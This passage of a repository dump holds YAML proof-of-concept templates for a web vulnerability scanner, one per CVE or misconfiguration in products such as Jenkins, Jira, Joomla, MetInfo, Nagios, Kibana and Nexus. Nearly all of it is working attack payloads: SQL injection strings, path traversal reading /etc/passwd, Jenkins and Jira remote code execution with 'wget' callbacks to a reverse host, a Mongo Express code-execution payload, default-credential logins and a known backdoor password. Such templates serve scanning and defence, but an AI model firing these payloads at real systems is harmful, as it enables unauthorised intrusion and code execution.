"\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body) 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | Affected Version: "v4.31" 18 | links: 19 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313 20 | - http://www.iwantacve.cn/index.php/archives/311/ 21 | - https://nvd.nist.gov/vuln/detail/CVE-2019-16312 -------------------------------------------------------------------------------- /pkg/pocs/influxdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-influxdb-unauth 2 | rules: 3 | - method: GET 4 | path: /ping 5 | follow_redirects: true 6 | expression: | 7 | response.status == 204 && "x-influxdb-version" in response.headers 8 | - method: GET 9 | path: /query?q=show%20users 10 | follow_redirects: true 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"columns") && response.body.bcontains(b"user") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://docs.influxdata.com/influxdb/v1.7/tools/api/ -------------------------------------------------------------------------------- /pkg/pocs/jboss-cve-2010-1871.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-cve-2010-1871 2 | set: 3 | r1: randomInt(8000000, 10000000) 4 | r2: randomInt(8000000, 10000000) 5 | rules: 6 | - method: GET 7 | path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d 8 | follow_redirects: false 9 | expression: | 10 | response.status == 302 && response.headers["location"].contains(string(r1 * r2)) 11 | detail: 12 | author: fuping 13 | links: 14 | - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 -------------------------------------------------------------------------------- /pkg/pocs/jboss-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | rules: 3 | - method: GET 4 | path: /jmx-console/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://xz.aliyun.com/t/6103 -------------------------------------------------------------------------------- /pkg/pocs/jenkins-cve-2018-1000600.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000600 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} 8 | expression: | 9 | response.status == 200 && reverse.wait(5) 10 | detail: 11 | author: PickledFish(https://github.com/PickledFish) 12 | links: 13 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 14 | -------------------------------------------------------------------------------- /pkg/pocs/jenkins-cve-2018-1000861-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000861-rce 2 | set: 3 | rand: randomLowercase(4) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; 8 | follow_redirects: false 9 | expression: >- 10 | response.status == 200 && response.body.bcontains(bytes("package#" + rand)) 11 | detail: 12 | author: p0wd3r 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 15 | -------------------------------------------------------------------------------- /pkg/pocs/jenkins-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-unauthorized-access 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: GET 7 | path: /script 8 | follow_redirects: false 9 | expression: response.status == 200 10 | search: | 11 | "Jenkins-Crumb", "(?P.+?)"\); 12 | - method: POST 13 | path: /script 14 | body: | 15 | script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) 17 | detail: 18 | author: MrP01ntSun(https://github.com/MrPointSun) 19 | links: 20 | - https://www.cnblogs.com/yuzly/p/11255609.html 21 | - https://blog.51cto.com/13770310/2156663 22 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-11581.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-11581 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /secure/ContactAdministrators!default.jspa 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 11 | search: name="atlassian-token" content="(?P.+?)" 12 | - method: POST 13 | path: /secure/ContactAdministrators.jspa 14 | body: >- 15 | from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81 16 | follow_redirects: false 17 | expression: | 18 | response.status == 302 && reverse.wait(5) 19 | detail: 20 | author: harris2015(https://github.com/harris2015) 21 | Affected Version: "cve-2019-11581" 22 | links: 23 | - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html 24 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-8442.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8442 2 | rules: 3 | - method: GET 4 | path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 12 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-8449.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8449 2 | rules: 3 | - method: GET 4 | path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false 5 | expression: | 6 | response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users") 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://xz.aliyun.com/t/7219 11 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | rules: 3 | - method: GET 4 | path: /secure/QueryComponent!Default.jspa 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 8 | detail: 9 | author: harris2015(https://github.com/harris2015) 10 | links: 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 12 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2020-14181.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14181 2 | set: 3 | r: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /secure/ViewUserHover.jspa?username={{r}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira")) 10 | detail: 11 | author: whwlsfb(https://github.com/whwlsfb) 12 | links: 13 | - https://www.tenable.com/cve/CVE-2020-14181 14 | - https://twitter.com/ptswarm/status/1318914772918767619 15 | -------------------------------------------------------------------------------- /pkg/pocs/jira-ssrf-cve-2019-8451.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-ssrf-cve-2019-8451 2 | set: 3 | originScheme: request.url.scheme 4 | originHost: request.url.host 5 | reverse: newReverse() 6 | reverseHost: reverse.url.host 7 | reverseURL: reverse.url.path 8 | rules: 9 | - method: GET 10 | path: >- 11 | /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}} 12 | headers: 13 | X-Atlassian-Token: no-check 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: jingling(https://github.com/shmilylty) 18 | links: 19 | - https://jira.atlassian.com/browse/JRASERVER-69793 20 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-component-vreview-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-component-vreview-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?option=com_vreview&task=displayReply 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)# 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | detail: 15 | author: 南方有梦(https://github.com/hackgov) 16 | Affected Version: "1.9.11" 17 | links: 18 | - https://www.exploit-db.com/exploits/46227 19 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2015-7297-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2015-7297-sqli 2 | rules: 3 | - method: GET 4 | path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://www.exploit-db.com/exploits/38797 9 | - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html 10 | - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | rules: 3 | - method: GET 4 | path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: 南方有梦(http://github.com/hackgov) 11 | Affected Version: "3.0.2" 12 | links: 13 | - https://www.exploit-db.com/exploits/44160 14 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: >- 7 | /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists") 15 | detail: 16 | author: leezp 17 | Affected Version: "zhBaidumap plugin 3.0.0.*" 18 | links: 19 | - https://www.exploit-db.com/exploits/43974 20 | - https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb3afNULL0&chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617f2b60&mpshare=1&scene=23&srcid=0418r0yqNrZ1hyGCdDHl8EK1#rd -------------------------------------------------------------------------------- /pkg/pocs/jupyter-notebook-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: "/terminals/3" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 12 | -------------------------------------------------------------------------------- /pkg/pocs/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | links: 11 | - https://blog.csdn.net/qq_36923426/article/details/111361158 12 | -------------------------------------------------------------------------------- /pkg/pocs/kibana-cve-2018-17246.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-cve-2018-17246 2 | rules: 3 | - method: GET 4 | path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\"")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | kibana_version: before 6.4.3 and 5.6.13 11 | links: 12 | - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 13 | - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md 14 | -------------------------------------------------------------------------------- /pkg/pocs/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | rules: 3 | - method: GET 4 | path: /app/kibana 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 8 | detail: 9 | author: Isaac(https://github.com/IsaacQiang) 10 | links: 11 | - https://zhuanlan.zhihu.com/p/61215662 -------------------------------------------------------------------------------- /pkg/pocs/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"kong_env") 7 | - method: GET 8 | path: /status 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 11 | detail: 12 | author: Loneyer 13 | links: 14 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 15 | -------------------------------------------------------------------------------- /pkg/pocs/lanproxy-cve-2021-3019-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-lanproxy-cve-2021-3019-lfi 2 | rules: 3 | - method: GET 4 | path: "/../conf/config.properties" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "lanproxy 0.1" 10 | links: 11 | - https://github.com/ffay/lanproxy/issues/152 12 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 13 | -------------------------------------------------------------------------------- /pkg/pocs/laravel-debug-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-debug-info-leak 2 | rules: 3 | - method: POST 4 | path: / 5 | follow_redirects: false 6 | expression: > 7 | response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper/tree/master/laravel/5_debug 12 | -------------------------------------------------------------------------------- /pkg/pocs/laravel-improper-webdir.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-improper-webdir 2 | rules: 3 | - method: GET 4 | path: /storage/logs/laravel.log 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper 12 | -------------------------------------------------------------------------------- /pkg/pocs/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | Affected Version: "maccms8.x" 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | links: 14 | - https://www.cnblogs.com/test404/p/7397755.html -------------------------------------------------------------------------------- /pkg/pocs/maccmsv10-backdoor.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccmsv10-backdoor 2 | rules: 3 | - method: POST 4 | path: /extend/Qcloud/Sms/Sms.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: getpwd=WorldFilledWithLove 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"扫描后门") && response.body.bcontains(b"反弹端口") && response.body.bcontains(b"文件管理") 11 | detail: 12 | author: FiveAourThe(https://github.com/FiveAourThe) 13 | links: 14 | - https://www.cnblogs.com/jinqi520/p/11596500.html 15 | - https://www.t00ls.net/thread-53291-1-1.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-16996-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16996-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1 -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-16997-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16997-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /admin/?n=language&c=language_general&a=doExportPack 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: 'appno= 1 union SELECT {{r1}}*{{r2}},1&editor=cn&site=web' 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | metinfo_version: 7.0.0beta 17 | links: 18 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2 -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-17418-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-17418-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://github.com/evi1code/Just-for-fun/issues/2 17 | -------------------------------------------------------------------------------- /pkg/pocs/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | rules: 3 | - method: GET 4 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(b"- 8 | {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token") && response.content_type.contains("json") 12 | detail: 13 | author: harris2015 14 | links: 15 | - https://docs.min.io/cn/ 16 | -------------------------------------------------------------------------------- /pkg/pocs/mongo-express-cve-2019-10758.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-mongo-express-cve-2019-10758 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /checkValid 8 | headers: 9 | Authorization: Basic YWRtaW46cGFzcw== 10 | body: >- 11 | document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') 12 | follow_redirects: true 13 | expression: > 14 | reverse.wait(5) 15 | detail: 16 | vulnpath: '/checkValid' 17 | author: fnmsd(https://github.com/fnmsd) 18 | description: 'Mongo Express CVE-2019-10758 Code Execution' 19 | links: 20 | - https://github.com/masahiro331/CVE-2019-10758 21 | - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html -------------------------------------------------------------------------------- /pkg/pocs/msvod-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-msvod-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /pkg/pocs/myucms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-myucms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://github.com/jinqi520 11 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10735.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10735 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97265 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10736 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97266 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10737.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10737 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/logbook.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97267 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737 20 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10738.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10738 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/menuaccess.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97268 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738 20 | -------------------------------------------------------------------------------- /pkg/pocs/netgear-cve-2017-5521.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netgear-cve-2017-5521 2 | rules: 3 | - method: POST 4 | path: /passwordrecovered.cgi?id=get_rekt 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 8 | detail: 9 | author: betta(https://github.com/betta-cyber) 10 | links: 11 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 12 | -------------------------------------------------------------------------------- /pkg/pocs/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | rules: 3 | - method: GET 4 | path: /_next/../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | version: <2.4.1 10 | author: Loneyer 11 | links: 12 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 13 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 14 | -------------------------------------------------------------------------------- /pkg/pocs/nexus-cve-2020-10199.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-cve-2020-10199 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: "/rest/beta/repositories/go/group" 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} 12 | expression: | 13 | response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | Affected Version: "nexus<3.21.2" 16 | author: kingkk(https://www.kingkk.com/) 17 | links: 18 | - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb 19 | - https://www.cnblogs.com/magic-zero/p/12641068.html 20 | - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype 21 | - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 22 | -------------------------------------------------------------------------------- 